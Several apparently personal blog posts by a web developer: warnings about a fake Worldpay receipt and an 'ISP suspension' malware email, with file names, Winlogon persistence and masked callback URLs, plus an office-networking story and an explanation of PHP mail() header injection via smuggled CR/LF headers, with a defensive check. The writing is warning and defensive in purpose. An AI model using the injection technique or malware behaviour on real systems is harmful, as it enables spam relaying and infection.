This afternoon I received an email with the subject “Worldpay CARD transaction Confirmation“, which instantly caught my attention because I use Worldpay while paying off one of my credit cards, and for a moment I wondered if I had done it and forgotten about it.
The email content was as follows:
Thank you!
Your transaction has been processed by WorldPay, on behalf of Amazon Inc.
The invoice file is attached to this message.
This is not a tax receipt.
We processed your payment.
Amazon Inc has received your order,
and will inform you about delivery.
Sincerely,
Amazon Team
This confirmation only indicates that your transaction has been processed successfully.
It does not indicate that your order has been accepted.
It is the responsibility of Amazon Inc to confirm that your order has been accepted, and to deliver any goods or services you have ordered.
All very convincing and official-looking, but Amazon doesn’t use Worldpay, and the email was not sent to amazon@<my email domain> – it was sent to my office address which is only used for, well, office stuff.
The email attachment is a simple HTML file so it is not picked up as anything dodgy, but it comprises a single META REFRESH line directing you to an executable file hosted elsewhere, so don’t open the attachment.
If you receive an email with the subject ‘Your internet access is going to get suspended’ then don’t panic – it’s another Virus doing the rounds that sends out these worryingly-phrased emails in an attempt to trick you into running the attachment and infecting yourself with the payload. Several sites have picked up on it and a few of the popular virus scanning packages had spotted is already.
The message reads:
Your internet access is going to get suspended
The Internet Service Provider Consorcium was made to protect the rights of
software authors, artists. We conduct regular wiretapping on our networks,
to monitor criminal acts.
We are aware of your illegal activities on the internet wich were originating from
You can check the report of your activities in the past 6 month that we have
attached. We strongly advise you to stop your activities regarding the illegal
downloading of copyrighted material of your internet access will be suspended.
Sincerely
ICS Monitoring Team
The message contains a randomly-named zip file in the format user-XXXXXXXX-activities.zip and after extracting the file is user-XXXXXXXX-activities.exe where XXXXXXXX is random characters.
The malware registers a Winlogon notification package so that the installed module is loaded into the address space of winlogon.exe. The files cabpck.dll (known as theMal/TinyDL-T by Sophos), k86.bin and krnlcab.sys (known as the Backdoor:Win32/Haxdoor by Microsoft)) are created in the %System% folder.
A directory %Temp%\msi_setup will be created and a new connection with some host is made: http://****-****.biz/jerken/data.php?trac kid=706172616D3D6 or http://*****.net/22/data.php?trackid=7061 72616D3D636D64266C616E6
It makes a change from the usual ‘Please find your receipt attached’ approach, but my main concern is the number of clients who will instantly think they’ve done something wrong and go ahead and get infected.
By now, many of you will be well aware of my hatred for all things MySpace-related. Here’s a typical email exchange, illustrating just why I detest them…
Subject: you are downloaded stuff to my computer without my permission
i do not know why u r pop up on my screen but can u please tnot pop up
Sure, I can ‘tnot pop up’. Suspecting another d04.net scam, since the email had come in via the d04.net account, I wrote back:
Hi,
D04.net does not download anything to anyone’s computer. It is a simple web page. Please read about what d04.net is before emailing. Thanks.
http://www.d04.net/
What link did you click on to get to the website? What site did it link to? (should end in d04.net is it’s on our service).
D
Of course, that didn’t actually make the writer stop and think…
yes it does it putting nasty web sites on my comnputer thank i have alrwady report it to spam any way u do not know what u are talking about every time i trying to send someone a message a my space your web site po up why
Oh noes! I’ve been ‘alrwady report to spam’! I write back again…
Please tell me what address is at the top of the page. Do you see a blue bar across the top with a ‘Report This Site’ button on it? If so, please click the button and I will know what site you are talking about.
Please don’t tell me what my site does or doesn’t do – I wrote it. If you are not willing to answer the questions I ask, I can’t help you.
D
But no, I was WRONG! I obviously DON’T know what my own website does…
yes it does when i try to get on my space to send message to some one why do your web page come up u know i am going to report u to spam
Perhaps my web page comes up because.. I dunno.. you’re not looking at MySpace anymore or something equally impossible? Honestly, I couldn’t be bothered to write back after this because it was only going to go downhill from here. Sheesh!
Just checked the admin email account for the other company I work for and we’ve suddenly got 20,000 emails clogging everything up. What the blinking flip?!? Almost every one is a message from Cron along the lines of:
We only actually found out about this because I checked the email account to see if there was an error message from sendmail. A client’s new server has decided to stop sending out email shortly before their site goes live (and right before I demonstrated how ace the site was – argh!) and it turns out that somewhere in the bowels of the machine the IP address for domain.com is still pointing to the old server. www.domain.com is fine, and domain.com is still resolving correctly from anywhere on the internet, but internally the IP address for domain.com is wrong.
Or at least is was. Ping from within the server now resolves correctly but email still isn’t getting out. I’ve given up for the weekend, too – heheheh.
The fun all started when we moved offices. We actually stayed within the same building but moved from the slightly-newer part of the building into the slightly-older part. This meant that the fibre cable transporting our Internet connection across the entire roof of the building was redundant and BT had to be called to connect it to a different – hopefully much shorter – piece of cable. BT have been called, and in their infinite wisdom they won’t help us until we find an account number for them.
So, no problem, as a temporary measure we’ll use the high speed Internet access that comes with the building. We track down Dave the Network Bloke and he fixes us up with a couple of live ports so we have Internets in t’office. Unfortunately, since several large companies have moved into the office complex it’s no longer ‘High Speed’. In fact it’s absolute shite. No matter! It’s only for a few days. Possibly.
The next problem to rear it’s ugly head was regarding sending mail using SMTP. No problem, we’ll just use our own server as usual. In order to do this I need to add the IP of the connection to the list of permitted relayers on the server – pretty straightforward stuff. Unfortunately I remember why we left the built-in (Once) High Speed Internet – they block a port required for us to configure our server. It’s an outgoing port, but they’ve blocked it nonetheless. Hnnnng!
O-Kaaay. The only available option at this point is to hook my 15in Powerbook up to my Sony Ericsson k750i via Bluetooth and create a dialup connection that will allow me to bypass this shitty firewall and configure the server. I run through the pretty little OSX configuration wizard and the Powerbook connects to the k750i without problems… but it won’t dial. It prompts for permission to connect to the Internet and does nothing. Eventually it transpires that I need to select the ‘Ericsson T39 14.4′ script, and hey presto – it dials the 123-Reg’s 0845 Dialup number and away we go.
Except that, because the walls are full of wire, I only get two bars on my phone and the connection is pretty much halved from 14.4. Eventually it crawls through the login process and I remember which buttons to click on the first go (saving me several minutes on the phone bill, no doubt) and I get to enter the IP address of the Formerly High Speed Internet Connection. Huzzah! I can send email!
Unfortunately so can everyone in the office complex, but I won’t tell them if you won’t.
I was at a client’s last week and the guy who handles the email mentioned that they were getting a lot of spam from the same email addresses, all of which were at the default name of our server. I had a quick look and, sure enough, email was being sent through a mail script on the back end of my client’s Contact Us page. Because the To: address is hardwritten into the script, my client received copies of the spam as well as the injected recipients.
How the Email Injection Attack works…
The injection attack works with any mailing script that uses the PHP mail() function. If the script accepts a name and email address, and formats those into the From: field of your email, then they can be used to insert extra email addresses anonymously.
Ordinarily you would take a name ($name) and an email address ($email) and create a string like so:
$headers="From: $name <$email>\r\n";
which creates:
From: MyName <user@domain.tld>
followed by a ‘\r\n’, or Character Return+Line Feed.
Using a form on another server, or even the existing form if there’s no client-side length checking, the spammer submits the following as $name:
PHP’s mail() function puts these into the headers as usual, but the headers now contain an extra Subject: and Bcc: field that were not there before. Either the $name or $email variables (in our example) can be used for this, and there’s nothing to stop them attaching files using MIME.
So How to I Protect Against Email Header Injection Attacks?
Thankfully, protecting yourself is quite easy – probably the easiest way is for you to check the vulnerable fields for illegal content on receipt by your processing script. My approach was to write a simple function using a regular expression, thus:
If either ‘Cc:’, ‘Bcc:’ or ‘Subject:’ is found somewhere it shouldn’t be, the script generates an email containing the name of the script and the spammer’s IP address, sends it to spamcheck@domain.tld and promptly dies.